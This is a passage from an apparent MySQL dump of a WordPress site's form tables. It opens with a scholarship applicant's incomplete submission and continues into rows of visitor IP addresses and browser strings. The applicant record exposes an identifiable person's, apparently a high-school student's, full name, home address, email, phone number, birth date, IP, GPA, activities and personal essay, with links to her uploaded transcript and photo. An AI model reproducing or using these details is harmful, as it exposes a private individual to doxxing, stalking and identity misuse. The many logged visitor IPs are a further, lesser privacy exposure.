treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid.\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\\r\\n\\r\\nNational Honor Society                           \\r\\nMember                                 [November 2018 - Present]\\r\\nVolunteer for community service in and out of school\\r\\n30 hours of community service per school year\\r\\n\\r\\nStudent Member of the Board \\r\\nStudent Delegate \\t\\t\\t\\t             [February 2018]\\r\\nHelped to elect the final Student Member of the Board candidates and communicated information to students of River Hill High School \",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid. \\r\\n \\r\\n\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816bdda2a31\"}');
/*!40000 ALTER TABLE `lwz_rg_incomplete_submissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_lead`
--

DROP TABLE IF EXISTS `lwz_rg_lead`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_lead` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(8) unsigned NOT NULL,
  `post_id` bigint(20) unsigned DEFAULT NULL,
  `date_created` datetime NOT NULL,
  `is_starred` tinyint(1) NOT NULL DEFAULT '0',
  `is_read` tinyint(1) NOT NULL DEFAULT '0',
  `ip` varchar(39) NOT NULL,
  `source_url` varchar(200) NOT NULL DEFAULT '',
  `user_agent` varchar(250) NOT NULL DEFAULT '',
  `currency` varchar(5) DEFAULT NULL,
  `payment_status` varchar(15) DEFAULT NULL,
  `payment_date` datetime DEFAULT NULL,
  `payment_amount` decimal(19,2) DEFAULT NULL,
  `transaction_id` varchar(50) DEFAULT NULL,
  `is_fulfilled` tinyint(1) DEFAULT NULL,
  `created_by` bigint(20) unsigned DEFAULT NULL,
  `transaction_type` tinyint(1) DEFAULT NULL,
  `status` varchar(20) NOT NULL DEFAULT 'active',
  `payment_method` varchar(30) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `status` (`status`)
) ENGINE=MyISAM AUTO_INCREMENT=503 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_lead`
--

LOCK TABLES `lwz_rg_lead` WRITE;
/*!40000 ALTER TABLE `lwz_rg_lead` DISABLE KEYS */;
INSERT INTO `lwz_rg_lead` VALUES (1,1,NULL,'2013-10-18 14:10:34',0,0,'70.192.229.109','http://zphiblgz.org/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(2,1,NULL,'2013-11-08 00:34:31',0,0,'70.192.223.60','http://zphiblgz.org/membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_3 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B511 Safari/9537.53','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(3,1,NULL,'2013-12-04 03:41:33',0,0,'195.42.102.75','http://zphiblgz.org/contact/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(4,2,NULL,'2014-02-12 04:23:28',0,0,'173.64.116.162','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MAGWJS)','USD',NULL,NULL,NULL,NULL,NULL,2,NULL,'active',NULL),(5,2,NULL,'2014-02-12 04:33:22',0,0,'173.64.116.162','http://zphiblgz.org/category/events/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MAGWJS)','USD',NULL,NULL,NULL,NULL,NULL,2,NULL,'active',NULL),(6,1,NULL,'2014-02-12 17:21:32',0,0,'216.81.94.75','http://zphiblgz.org/membership/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; InfoPath.2)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(7,1,NULL,'2014-02-16 14:46:22',0,0,'70.192.195.149','http://zphiblgz.org/membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(8,2,NULL,'2014-02-17 17:45:00',0,0,'66.87.83.220','http://zphiblgz.org/category/events/','Mozilla/5.0 (Linux; U; Android 4.3; en-us; SPH-L710 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(9,1,NULL,'2014-02-20 21:01:08',0,0,'216.152.249.242','http://zphiblgz.org/membership/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(10,2,NULL,'2014-02-21 02:45:59',0,0,'96.244.152.247','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(11,2,NULL,'2014-02-23 18:08:57',0,0,'98.218.17.106','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(12,2,NULL,'2014-02-25 14:37:51',0,0,'24.104.140.50','http://zphiblgz.org/category/events/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(13,2,NULL,'2014-02-25 18:02:06',0,0,'24.104.140.35','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(14,2,NULL,'2014-02-26 20:21:52',0,0,'24.104.140.35','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(15,2,NULL,'2014-02-26 21:15:57',0,0,'173.59.224.159','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Linux; Android 4.1.2; SPH-M840 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.132 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(16,2,NULL,'2014-02-27 12:37:18',0,0,'24.104.140.35','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(17,2,NULL,'2014-02-27 19:04:35',0,0,'68.48.232.215','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(18,2,NULL,'2014-02-27 19:47:50',0,0,'76.100.48.226','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(19,2,NULL,'2014-02-27 22:22:34',0,0,'74.103.28.218','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Linux; Android 4.3; SCH-I545 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.132 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(20,2,NULL,'2014-02-27 22:40:40',0,0,'68.33.168.41','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(21,2,NULL,'2014-02-28 10:42:41',0,0,'50.190.106.158','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(22,2,NULL,'2014-02-28 12:46:42',0,0,'24.104.140.50','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(23,2,NULL,'2014-02-28 16:11:16',0,0,'108.28.190.69','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(24,2,NULL,'2014-02-28 17:28:46',0,0,'24.104.140.50','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(25,2,NULL,'2014-02-28 18:14:04',0,0,'24.104.140.50','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(26,2,NULL,'2014-02-28 21:27:19',0,0,'98.117.46.13','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(27,2,NULL,'2014-03-01 03:38:09',0,0,'70.208.129.105','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(28,2,NULL,'2014-03-01 13:59:45',0,0,'69.250.66.88','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(29,2,NULL,'2014-03-01 14:31:45',0,0,'69.250.66.88','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(30,2,NULL,'2014-03-01 15:25:46',0,0,'173.79.33.162','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(31,2,NULL,'2014-03-01 16:49:44',0,0,'69.140.141.43','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(32,2,NULL,'2014-03-01 18:24:44',0,0,'68.50.52.13','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(33,2,NULL,'2014-03-01 23:17:10',0,0,'108.15.31.72','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(34,2,NULL,'2014-03-02 02:11:14',0,0,'108.50.43.203','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(35,2,NULL,'2014-03-03 03:12:11',0,0,'108.50.57.129','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(36,2,NULL,'2014-03-04 03:56:10',0,0,'108.15.73.178','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_6 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11B651','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(37,2,NULL,'2014-03-05 15:41:19',0,0,'24.104.140.35','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(38,2,NULL,'2014-03-05 16:38:23',0,0,'24.104.140.35','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(39,1,NULL,'2014-03-05 16:40:48',0,0,'24.104.140.50','http://zphiblgz.org/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(40,2,NULL,'2014-03-05 18:49:45',0,0,'24.104.140.50','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(41,2,NULL,'2014-03-05 19:22:06',0,0,'24.104.140.50','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(42,2,NULL,'2014-03-05 19:48:53',0,0,'74.106.235.51','http://zphiblgz.org/Pretty-Polished-Affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(43,2,NULL,'2014-03-05 23:21:10',0,0,'68.48.198.197','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(44,2,NULL,'2014-03-06 00:22:32',0,0,'68.33.169.139','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SGH-T999 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(45,2,NULL,'2014-03-06 01:36:36',0,0,'68.55.51.9','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(46,2,NULL,'2014-03-06 14:25:04',0,0,'24.104.140.35','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(47,2,NULL,'2014-03-06 16:24:48',0,0,'74.93.203.133','http://ZPHIBLGZ.ORG/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SGH-T679 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(48,2,NULL,'2014-03-06 16:31:53',0,0,'74.93.203.133','http://ZPHIBLGZ.ORG/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SGH-T679 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(49,2,NULL,'2014-03-06 16:55:42',0,0,'24.104.140.35','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(50,2,NULL,'2014-03-07 01:14:42',0,0,'96.241.200.70','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(51,2,NULL,'2014-03-07 02:25:43',0,0,'173.79.32.40','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(52,2,NULL,'2014-03-07 13:08:52',0,0,'24.104.140.35','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SonyEricssonLT28at Build/6.1.C.1.111) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(53,2,NULL,'2014-03-07 16:05:17',0,0,'24.104.140.35','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I727 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(54,2,NULL,'2014-03-07 16:28:35',0,0,'24.104.140.35','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(55,2,NULL,'2014-03-07 17:11:15',0,0,'24.104.140.50','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(56,2,NULL,'2014-03-07 17:20:17',0,0,'24.104.140.50','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(57,2,NULL,'2014-03-07 18:50:32',0,0,'24.104.140.50','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(58,2,NULL,'2014-03-07 19:53:05',0,0,'69.143.195.253','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SonyEricssonLT28at Build/6.1.C.1.111) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(59,2,NULL,'2014-03-07 22:04:27',0,0,'173.79.43.118','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(60,2,NULL,'2014-03-08 00:03:32',0,0,'76.100.110.177','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(61,2,NULL,'2014-03-08 00:41:28',0,0,'74.106.252.158','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 